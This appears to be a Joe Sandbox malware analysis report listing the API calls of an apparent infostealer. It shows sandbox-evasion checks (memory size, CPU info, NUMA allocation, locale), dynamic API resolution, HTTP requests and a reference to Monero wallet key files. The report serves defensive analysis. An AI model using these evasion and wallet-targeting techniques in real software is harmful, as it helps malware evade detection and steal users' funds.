                    • Opcode Fuzzy Hash: e1be05b54c7224dd7c4f3fb5192b8b20607fe20903b4b755d22da84ed34a24f6
                    • Instruction Fuzzy Hash: CE0162B2944309EFC704DF95DD49BAEFBF8F704B11F10426AE545A2380E77959448BA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BC11B7), ref: 00BD7880
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD7887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BD789F
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser
                    • String ID:
                    • API String ID: 1296208442-0
                    • Opcode ID: 4b66dd1176f0df59df9d719bfa1074a01786d03708e4f6e41178d3f55a92cd80
                    • Instruction ID: 3c9c06617812140fdd95215dc9d8b85dc015bb13fba8d9f7dd02a7ef08a64eba
                    • Opcode Fuzzy Hash: 4b66dd1176f0df59df9d719bfa1074a01786d03708e4f6e41178d3f55a92cd80
                    • Instruction Fuzzy Hash: 78F04FB1944208AFC704DF99DD49BAEFBB8EB04711F10426AFA05A2780D77515448BA1
                    APIs
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 8bbdeaea0f9bc1d17f8f87e736be0924ff6225c3e1908a04bc400be84ac9c47f
                    • Instruction ID: 353643eaaaa1c641700ef65da15daea263a1092d739eb9b581144c104087409e
                    • Opcode Fuzzy Hash: 8bbdeaea0f9bc1d17f8f87e736be0924ff6225c3e1908a04bc400be84ac9c47f
                    • Instruction Fuzzy Hash: C9D05E7490030CDFCB00DFE1D849AEDBBB8FB08311F0805A9D90572340EA3154C5CAA6

                    Control-flow Graph

                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,013B5B30), ref: 00BD9C2D
                    • GetProcAddress.KERNEL32(74DD0000,013B5C90), ref: 00BD9C45
                    • GetProcAddress.KERNEL32(74DD0000,013C94C0), ref: 00BD9C5E
                    • GetProcAddress.KERNEL32(74DD0000,013C94F0), ref: 00BD9C76
                    • GetProcAddress.KERNEL32(74DD0000,013C9508), ref: 00BD9C8E
                    • GetProcAddress.KERNEL32(74DD0000,013C9538), ref: 00BD9CA7
                    • GetProcAddress.KERNEL32(74DD0000,013BBA90), ref: 00BD9CBF
                    • GetProcAddress.KERNEL32(74DD0000,013CD0C8), ref: 00BD9CD7
                    • GetProcAddress.KERNEL32(74DD0000,013CD0E0), ref: 00BD9CF0
                    • GetProcAddress.KERNEL32(74DD0000,013CD008), ref: 00BD9D08
                    • GetProcAddress.KERNEL32(74DD0000,013CCDF8), ref: 00BD9D20
                    • GetProcAddress.KERNEL32(74DD0000,013B5CB0), ref: 00BD9D39
                    • GetProcAddress.KERNEL32(74DD0000,013B5CD0), ref: 00BD9D51
                    • GetProcAddress.KERNEL32(74DD0000,013B5CF0), ref: 00BD9D69
                    • GetProcAddress.KERNEL32(74DD0000,013B5D10), ref: 00BD9D82
                    • GetProcAddress.KERNEL32(74DD0000,013CCEA0), ref: 00BD9D9A
                    • GetProcAddress.KERNEL32(74DD0000,013CCEE8), ref: 00BD9DB2
                    • GetProcAddress.KERNEL32(74DD0000,013BB950), ref: 00BD9DCB
                    • GetProcAddress.KERNEL32(74DD0000,013B5D30), ref: 00BD9DE3
                    • GetProcAddress.KERNEL32(74DD0000,013CCE88), ref: 00BD9DFB
                    • GetProcAddress.KERNEL32(74DD0000,013CCE58), ref: 00BD9E14
                    • GetProcAddress.KERNEL32(74DD0000,013CD020), ref: 00BD9E2C
                    • GetProcAddress.KERNEL32(74DD0000,013CCF00), ref: 00BD9E44
                    • GetProcAddress.KERNEL32(74DD0000,013B5D70), ref: 00BD9E5D
                    • GetProcAddress.KERNEL32(74DD0000,013CCF18), ref: 00BD9E75
                    • GetProcAddress.KERNEL32(74DD0000,013CD098), ref: 00BD9E8D
                    • GetProcAddress.KERNEL32(74DD0000,013CCEB8), ref: 00BD9EA6
                    • GetProcAddress.KERNEL32(74DD0000,013CCED0), ref: 00BD9EBE
                    • GetProcAddress.KERNEL32(74DD0000,013CCE10), ref: 00BD9ED6
                    • GetProcAddress.KERNEL32(74DD0000,013CCFF0), ref: 00BD9EEF
                    • GetProcAddress.KERNEL32(74DD0000,013CCE70), ref: 00BD9F07
                    • GetProcAddress.KERNEL32(74DD0000,013CCE28), ref: 00BD9F1F
                    • GetProcAddress.KERNEL32(74DD0000,013CCF30), ref: 00BD9F38
                    • GetProcAddress.KERNEL32(74DD0000,013CA540), ref: 00BD9F50
                    • GetProcAddress.KERNEL32(74DD0000,013CCF48), ref: 00BD9F68
                    • GetProcAddress.KERNEL32(74DD0000,013CCF60), ref: 00BD9F81
                    • GetProcAddress.KERNEL32(74DD0000,013B5D50), ref: 00BD9F99
                    • GetProcAddress.KERNEL32(74DD0000,013CD0B0), ref: 00BD9FB1
                    • GetProcAddress.KERNEL32(74DD0000,013B56B0), ref: 00BD9FCA
                    • GetProcAddress.KERNEL32(74DD0000,013CCF78), ref: 00BD9FE2
                    • GetProcAddress.KERNEL32(74DD0000,013CD038), ref: 00BD9FFA
                    • GetProcAddress.KERNEL32(74DD0000,013B59F0), ref: 00BDA013
                    • GetProcAddress.KERNEL32(74DD0000,013B5770), ref: 00BDA02B
                    • LoadLibraryA.KERNEL32(013CCF90,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA03D
                    • LoadLibraryA.KERNEL32(013CCFA8,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA04E
                    • LoadLibraryA.KERNEL32(013CCE40,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA060
                    • LoadLibraryA.KERNEL32(013CCFC0,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA072
                    • LoadLibraryA.KERNEL32(013CCFD8,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA083
                    • LoadLibraryA.KERNEL32(013CD050,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA095
                    • LoadLibraryA.KERNEL32(013CD068,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA0A7
                    • LoadLibraryA.KERNEL32(013CD080,?,00BD5CA3,00BE0AEB,?,?,?,?,?,?,?,?,?,?,00BE0AEA,00BE0AE3), ref: 00BDA0B8
                    • GetProcAddress.KERNEL32(75290000,013B5870), ref: 00BDA0DA
                    • GetProcAddress.KERNEL32(75290000,013CD380), ref: 00BDA0F2
                    • GetProcAddress.KERNEL32(75290000,013C8F28), ref: 00BDA10A
                    • GetProcAddress.KERNEL32(75290000,013CD158), ref: 00BDA123
                    • GetProcAddress.KERNEL32(75290000,013B59D0), ref: 00BDA13B
                    • GetProcAddress.KERNEL32(73B70000,013BB928), ref: 00BDA160
                    • GetProcAddress.KERNEL32(73B70000,013B5A10), ref: 00BDA179
                    • GetProcAddress.KERNEL32(73B70000,013BB680), ref: 00BDA191
                    • GetProcAddress.KERNEL32(73B70000,013CD290), ref: 00BDA1A9
                    • GetProcAddress.KERNEL32(73B70000,013CD2F0), ref: 00BDA1C2
                    • GetProcAddress.KERNEL32(73B70000,013B5790), ref: 00BDA1DA
                    • GetProcAddress.KERNEL32(73B70000,013B58D0), ref: 00BDA1F2
                    • GetProcAddress.KERNEL32(73B70000,013CD1D0), ref: 00BDA20B
                    • GetProcAddress.KERNEL32(752C0000,013B5A30), ref: 00BDA22C
                    • GetProcAddress.KERNEL32(752C0000,013B5A50), ref: 00BDA244
                    • GetProcAddress.KERNEL32(752C0000,013CD2A8), ref: 00BDA25D
                    • GetProcAddress.KERNEL32(752C0000,013CD320), ref: 00BDA275
                    • GetProcAddress.KERNEL32(752C0000,013B5A90), ref: 00BDA28D
                    • GetProcAddress.KERNEL32(74EC0000,013BB978), ref: 00BDA2B3
                    • GetProcAddress.KERNEL32(74EC0000,013BB6A8), ref: 00BDA2CB
                    • GetProcAddress.KERNEL32(74EC0000,013CD170), ref: 00BDA2E3
                    • GetProcAddress.KERNEL32(74EC0000,013B59B0), ref: 00BDA2FC
                    • GetProcAddress.KERNEL32(74EC0000,013B57F0), ref: 00BDA314
                    • GetProcAddress.KERNEL32(74EC0000,013BB6D0), ref: 00BDA32C
                    • GetProcAddress.KERNEL32(75BD0000,013CD398), ref: 00BDA352
                    • GetProcAddress.KERNEL32(75BD0000,013B5750), ref: 00BDA36A
                    • GetProcAddress.KERNEL32(75BD0000,013C8F38), ref: 00BDA382
                    • GetProcAddress.KERNEL32(75BD0000,013CD338), ref: 00BDA39B
                    • GetProcAddress.KERNEL32(75BD0000,013CD140), ref: 00BDA3B3
                    • GetProcAddress.KERNEL32(75BD0000,013B56D0), ref: 00BDA3CB
                    • GetProcAddress.KERNEL32(75BD0000,013B5810), ref: 00BDA3E4
                    • GetProcAddress.KERNEL32(75BD0000,013CD200), ref: 00BDA3FC
                    • GetProcAddress.KERNEL32(75BD0000,013CD218), ref: 00BDA414
                    • GetProcAddress.KERNEL32(75A70000,013B5730), ref: 00BDA436
                    • GetProcAddress.KERNEL32(75A70000,013CD278), ref: 00BDA44E
                    • GetProcAddress.KERNEL32(75A70000,013CD3B0), ref: 00BDA466
                    • GetProcAddress.KERNEL32(75A70000,013CD3C8), ref: 00BDA47F
                    • GetProcAddress.KERNEL32(75A70000,013CD1E8), ref: 00BDA497
                    • GetProcAddress.KERNEL32(75450000,013B5710), ref: 00BDA4B8
                    • GetProcAddress.KERNEL32(75450000,013B57B0), ref: 00BDA4D1
                    • GetProcAddress.KERNEL32(75DA0000,013B57D0), ref: 00BDA4F2
                    • GetProcAddress.KERNEL32(75DA0000,013CD350), ref: 00BDA50A
                    • GetProcAddress.KERNEL32(6F070000,013B5A70), ref: 00BDA530
                    • GetProcAddress.KERNEL32(6F070000,013B56F0), ref: 00BDA548
                    • GetProcAddress.KERNEL32(6F070000,013B5830), ref: 00BDA560
                    • GetProcAddress.KERNEL32(6F070000,013CD230), ref: 00BDA579
                    • GetProcAddress.KERNEL32(6F070000,013B5850), ref: 00BDA591
                    • GetProcAddress.KERNEL32(6F070000,013B5890), ref: 00BDA5A9
                    • GetProcAddress.KERNEL32(6F070000,013B58B0), ref: 00BDA5C2
                    • GetProcAddress.KERNEL32(6F070000,013B58F0), ref: 00BDA5DA
                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00BDA5F1
                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00BDA607
                    • GetProcAddress.KERNEL32(75AF0000,013CD368), ref: 00BDA629
                    • GetProcAddress.KERNEL32(75AF0000,013C8F68), ref: 00BDA641
                    • GetProcAddress.KERNEL32(75AF0000,013CD2C0), ref: 00BDA659
                    • GetProcAddress.KERNEL32(75AF0000,013CD3E0), ref: 00BDA672
                    • GetProcAddress.KERNEL32(75D90000,013B5910), ref: 00BDA693
                    • GetProcAddress.KERNEL32(6E360000,013CD188), ref: 00BDA6B4
                    • GetProcAddress.KERNEL32(6E360000,013B5930), ref: 00BDA6CD
                    • GetProcAddress.KERNEL32(6E360000,013CD0F8), ref: 00BDA6E5
                    • GetProcAddress.KERNEL32(6E360000,013CD110), ref: 00BDA6FD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: HttpQueryInfoA$InternetSetOptionA
                    • API String ID: 2238633743-1775429166
                    • Opcode ID: 6a0022f7389629a3e3cb334dd0a81caeb3a61f57d8c518e0a785e3795a212338
                    • Instruction ID: 9c67e25946a76980476a20c290c763a6dd0b9e35fbd11df36c8798a5e68355e9
                    • Opcode Fuzzy Hash: 6a0022f7389629a3e3cb334dd0a81caeb3a61f57d8c518e0a785e3795a212338
                    • Instruction Fuzzy Hash: EE62FCB5510308AFC348DFAAED8895637F9F74C60171CC53BA605E3268D63B94C9DB62

                    Control-flow Graph (rendered graph image not reproduced; basic-block node and edge list omitted, the APIs it references are listed below)
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • InternetOpenA.WININET(00BE0DFE,00000001,00000000,00000000,00000000), ref: 00BC62E1
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC6335
                    • HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC63D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00BC63FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BC646D
                    • InternetCloseHandle.WININET(00000000), ref: 00BC64EF
                    • InternetCloseHandle.WININET(00000000), ref: 00BC64F9
                    • InternetCloseHandle.WININET(00000000), ref: 00BC6503
                    Similarity
                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                    • String ID: ERROR$ERROR$GET$de-DE
                    • API String ID: 3749127164-1008115567
                    • Opcode ID: efb1fa22fce547352d5855794314656ed4c11552c7f29e2dc3c2045a4b763fed
                    • Instruction ID: 48cdf550996a7167fa95db8397e5bd08c2985dc7477b020588c0a89e6fa1ae02
                    • Opcode Fuzzy Hash: efb1fa22fce547352d5855794314656ed4c11552c7f29e2dc3c2045a4b763fed
                    • Instruction Fuzzy Hash: 11713F71A00358AFDB14DB94DC49FEEB7B8FB44700F1081A9F5096B290EBB56A89CF51

                    Control-flow Graph (rendered graph image not reproduced; basic-block node and edge list omitted, the APIs it references are listed below)
                    APIs
                      • Part of subcall function 00BDA820: lstrlen.KERNEL32(00BC4F05,?,?,00BC4F05,00BE0DDE), ref: 00BDA82B
                      • Part of subcall function 00BDA820: lstrcpy.KERNEL32(00BE0DDE,00000000), ref: 00BDA885
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5644
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD56A1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5857
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BD51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5228
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5318
                      • Part of subcall function 00BD52C0: lstrlen.KERNEL32(00000000), ref: 00BD532F
                      • Part of subcall function 00BD52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00BD5364
                      • Part of subcall function 00BD52C0: lstrlen.KERNEL32(00000000), ref: 00BD5383
                      • Part of subcall function 00BD52C0: lstrlen.KERNEL32(00000000), ref: 00BD53AE
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD578B
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BD5940
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5A0C
                    • Sleep.KERNEL32(0000EA60), ref: 00BD5A1B
                    Similarity
                    • API ID: lstrcpylstrlen$Sleep
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 507064821-2791005934
                    • Opcode ID: 612c21bd0bd3bc2f2ff890c1daeecafab0643c9f92a6cf5f64b5ac3840feeaeb
                    • Instruction ID: ace1223a532751a4c482c77e02016f87aa3cc2a8cb07be35cf8e57572fabc7e0
                    • Opcode Fuzzy Hash: 612c21bd0bd3bc2f2ff890c1daeecafab0643c9f92a6cf5f64b5ac3840feeaeb
                    • Instruction Fuzzy Hash: 87E144719102089ACB14FBA0DC96EEDB3BCAF54300F5085AAB40676291FF356F4DDB92

                    Control-flow Graph (rendered graph image not reproduced; basic-block node and edge list omitted, the APIs it references are listed below)
                    APIs
                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00BD17C5
                    • ExitProcess.KERNEL32 ref: 00BD17D1
                    Similarity
                    • API ID: ExitProcess
                    • String ID: block
                    • API String ID: 621844428-2199623458
                    • Opcode ID: ff91eb2e3caf5ba201701a46f00bc9055dc166c81f0c4d8de0f28f58b8272ab5
                    • Instruction ID: 1848d4d1f34c8dd72e7a0a3fc54fd9400c0f53525b02d2446f845a1ce13d1bcb
                    • Opcode Fuzzy Hash: ff91eb2e3caf5ba201701a46f00bc9055dc166c81f0c4d8de0f28f58b8272ab5
                    • Instruction Fuzzy Hash: E0518FB4A10209FFCB04DFA5D8A4ABEB7F5EF44304F14849AE80567350E775EA42DB62

                    Control-flow Graph (rendered graph image not reproduced; basic-block node and edge list omitted, the APIs it references are listed below)
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BD7542
                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD760A
                    • wsprintfA.USER32 ref: 00BD7640
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\
                    • API String ID: 1544550907-3809124531
                    • Opcode ID: 6d447860036b947c3ecc40f606b1c29822d717e12cfedde4886db18026ad2665
                    • Instruction ID: 1f57354b5769310e4590f422fecb0c0840d3e1146b44ad65db6a0fade9fefb78
                    • Opcode Fuzzy Hash: 6d447860036b947c3ecc40f606b1c29822d717e12cfedde4886db18026ad2665
                    • Instruction Fuzzy Hash: 2E41B6B1D44348ABDB10DF94DC45BDEB7B8EF18704F1440A9F50577280EB756A84CBA1

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2368), ref: 00BD98A1
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C24D0), ref: 00BD98BA
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2338), ref: 00BD98D2
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2500), ref: 00BD98EA
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C23E0), ref: 00BD9903
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C8FB8), ref: 00BD991B
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013B5DF0), ref: 00BD9933
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013B5BD0), ref: 00BD994C
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2308), ref: 00BD9964
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2248), ref: 00BD997C
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2410), ref: 00BD9995
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C2278), ref: 00BD99AD
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013B5AF0), ref: 00BD99C5
                      • Part of subcall function 00BD9860: GetProcAddress.KERNEL32(74DD0000,013C23F8), ref: 00BD99DE
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BC11D0: ExitProcess.KERNEL32 ref: 00BC1211
                      • Part of subcall function 00BC1160: GetSystemInfo.KERNEL32(?), ref: 00BC116A
                      • Part of subcall function 00BC1160: ExitProcess.KERNEL32 ref: 00BC117E
                      • Part of subcall function 00BC1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BC112B
                      • Part of subcall function 00BC1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BC1132
                      • Part of subcall function 00BC1110: ExitProcess.KERNEL32 ref: 00BC1143
                      • Part of subcall function 00BC1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BC123E
                      • Part of subcall function 00BC1220: __aulldiv.LIBCMT ref: 00BC1258
                      • Part of subcall function 00BC1220: __aulldiv.LIBCMT ref: 00BC1266
                      • Part of subcall function 00BC1220: ExitProcess.KERNEL32 ref: 00BC1294
                      • Part of subcall function 00BD6770: GetUserDefaultLangID.KERNEL32 ref: 00BD6774
                      • Part of subcall function 00BC1190: ExitProcess.KERNEL32 ref: 00BC11C6
                      • Part of subcall function 00BD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BC11B7), ref: 00BD7880
                      • Part of subcall function 00BD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7887
                      • Part of subcall function 00BD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BD789F
                      • Part of subcall function 00BD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7910
                      • Part of subcall function 00BD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7917
                      • Part of subcall function 00BD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BD792F
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00BD6AF9
                    • Sleep.KERNEL32(00001770), ref: 00BD6B04
                    • CloseHandle.KERNEL32(?,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6B1A
                    • ExitProcess.KERNEL32 ref: 00BD6B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 64fe25b6ed0e246ff31bbf5f91e725c3766d54338bc1f68b040c80d7b5e50fb1
                    • Instruction ID: d946e018b8436e11f1f73ee7fbdc36d69a4ffd0ea6a8e37af26a8f6ff61a6efc
                    • Opcode Fuzzy Hash: 64fe25b6ed0e246ff31bbf5f91e725c3766d54338bc1f68b040c80d7b5e50fb1
                    • Instruction Fuzzy Hash: C9312C70900208AADB04FBE1DC56FEEF7B8AF04300F1445AAF602B6292FF755945D6A6

                    Control-flow Graph (rendered as an image in the original; basic blocks and edges recovered from it)
                    • 1436: bc1220-bc1247, call bd89b0, GlobalMemoryStatusEx; edges to 1439, 1440
                    • 1439: bc1249-bc1271, call bdda00 (x2); edge to 1442
                    • 1440: bc1273-bc127a; edge to 1442
                    • 1442: bc1281-bc1285; edges to 1444, 1445
                    • 1444: bc129a-bc129d
                    • 1445: bc1287; edges to 1446, 1447
                    • 1446: bc1289-bc1290; edges to 1444, 1447
                    • 1447: bc1292-bc1294, ExitProcess
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BC123E
                    • __aulldiv.LIBCMT ref: 00BC1258
                    • __aulldiv.LIBCMT ref: 00BC1266
                    • ExitProcess.KERNEL32 ref: 00BC1294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
